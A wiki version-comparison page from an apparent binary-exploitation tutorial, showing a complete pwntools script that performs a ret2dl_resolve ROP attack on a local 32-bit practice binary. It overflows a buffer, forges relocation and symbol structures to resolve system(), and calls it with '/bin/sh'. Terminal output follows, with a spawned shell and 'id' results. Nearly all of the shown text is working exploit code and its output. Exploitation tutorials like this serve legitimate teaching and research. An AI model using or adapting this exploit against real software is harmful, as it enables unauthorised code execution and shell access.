Versions Compared

Old Version 7

changes.mady.by.user Lazenca.0x0

Saved on

compared with

New Version 8

changes.mady.by.user Lazenca.0x0

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Code Block
languagepy
titleRop.py
from pwn import *
from struct import *
  
#context.log_level = 'debug'
elf = ELF('./rop')
 
# get section address
addr_dynsym 	= elf.get_section_by_name('.dynsym').header['sh_addr']
addr_dynstr 	= elf.get_section_by_name('.dynstr').header['sh_addr']
addr_relplt 	= elf.get_section_by_name('.rel.plt').header['sh_addr']
addr_plt    	= elf.get_section_by_name('.plt').header['sh_addr']
addr_bss    	= elf.get_section_by_name('.bss').header['sh_addr']
addr_plt_read   = elf.plt['read']
addr_got_read   = elf.got['read']

log.info('Section Headers')
log.info('.dynsym  : ' + hex(addr_dynsym))
log.info('.dynstr  : ' + hex(addr_dynstr))
log.info('.rel.plt : ' + hex(addr_relplt))
log.info('.plt     : ' + hex(addr_plt))
log.info('.bss     : ' + hex(addr_bss))
log.info('read@plt : ' + hex(addr_plt_read))
log.info('read@got : ' + hex(addr_got_read))
 
addr_pop3 = 0x080484e9
addr_pop_ebp = 0x080484eb
addr_leave_ret = 0x080483a8

stack_size = 0x300
base_stage = addr_bss + stack_size

#read(0,base_stage,100)
#jmp base_stage
buf1 = 'A'* 62
buf1 += p32(addr_plt_read)
buf1 += p32(addr_pop3)
buf1 += p32(0)
buf1 += p32(base_stage)
buf1 += p32(100)
buf1 += p32(addr_pop_ebp)
buf1 += p32(base_stage)
buf1 += p32(addr_leave_ret)
 
addr_fake_reloc  = base_stage + 20
addr_fake_sym 	 = addr_fake_reloc + 8
addr_fake_symstr = addr_fake_sym +16
addr_fake_cmd 	 = addr_fake_symstr +7
 
fake_reloc_offset = addr_fake_reloc - addr_relplt
fake_r_info 	  = ((addr_fake_sym - addr_dynsym) * 16) & ~0xFF 	#FAKE ELF32_R_SYM
fake_r_info	  = fake_r_info | 0x7									#FAKE ELF32_R_TYPE
fake_st_name 	  = addr_fake_symstr - addr_dynstr

log.info('') 
log.info('Fake Struct Information')
log.info('fake_reloc_offset : ' + hex(fake_reloc_offset))
log.info('addr_fake_cmd   : ' + hex(addr_fake_cmd))
log.info('addr_got_read   : ' + hex(addr_got_read))
log.info('fake_r_info   : ' + hex(fake_r_info))
log.info('fake_st_name   : ' + hex(fake_st_name))

#_dl_runtime_resolve(struct link_map *l, fake_reloc_arg)
buf2 = 'AAAA'
buf2 += p32(addr_plt)
buf2 += p32(fake_reloc_offset)
buf2 += 'BBBB'
#Argument of the function
buf2 += p32(addr_fake_cmd)
#Fake Elf32_Rel
buf2 += p32(addr_got_read) 
buf2 += p32(fake_r_info)
#Fake Elf32_Sym
buf2 += p32(fake_st_name) 
buf2 += p32(0)
buf2 += p32(0)
buf2 += p32(0x12)
#String "system"
buf2 += 'system\x00'
#String "/bin/sh"
buf2 += '/bin/sh\x00'
 
binary = ELF(elf.path)
p = process(binary.path)
p.recvn(10)
p.send(buf1)
p.send(buf2)
p.interactive()
Code Block
lazenca0x0@ubuntu:~/Exploit/dl_resolve$ python exploit.py 
[!] Pwntools does not support 32-bit Python.  Use a 64-bit release.
[*] Checking for new versions of pwntools
    To disable this functionality, set the contents of /home/lazenca0x0/.pwntools-cache/update to 'never'.
[*] You have the latest version of Pwntools (3.12.2)
[*] '/home/lazenca0x0/Exploit/dl_resolve/rop'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] Section Headers
[*] .dynsym  : 0x80481cc
[*] .dynstr  : 0x804822c
[*] .rel.plt : 0x80482b0
[*] .plt     : 0x80482f0
[*] .bss     : 0x804a020
[*] read@plt : 0x8048300
[*] read@got : 0x804a00c
[*] 
[*] Fake Struct Information
[*] fake_reloc_offset : 0x2084
[*] addr_fake_cmd   : 0x804a353
[*] addr_got_read   : 0x804a00c
[*] fake_r_info   : 0x21707
[*] fake_st_name   : 0x2120
[+] Starting local process '/home/lazenca0x0/Exploit/dl_resolve/rop': pid 12887
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

References

...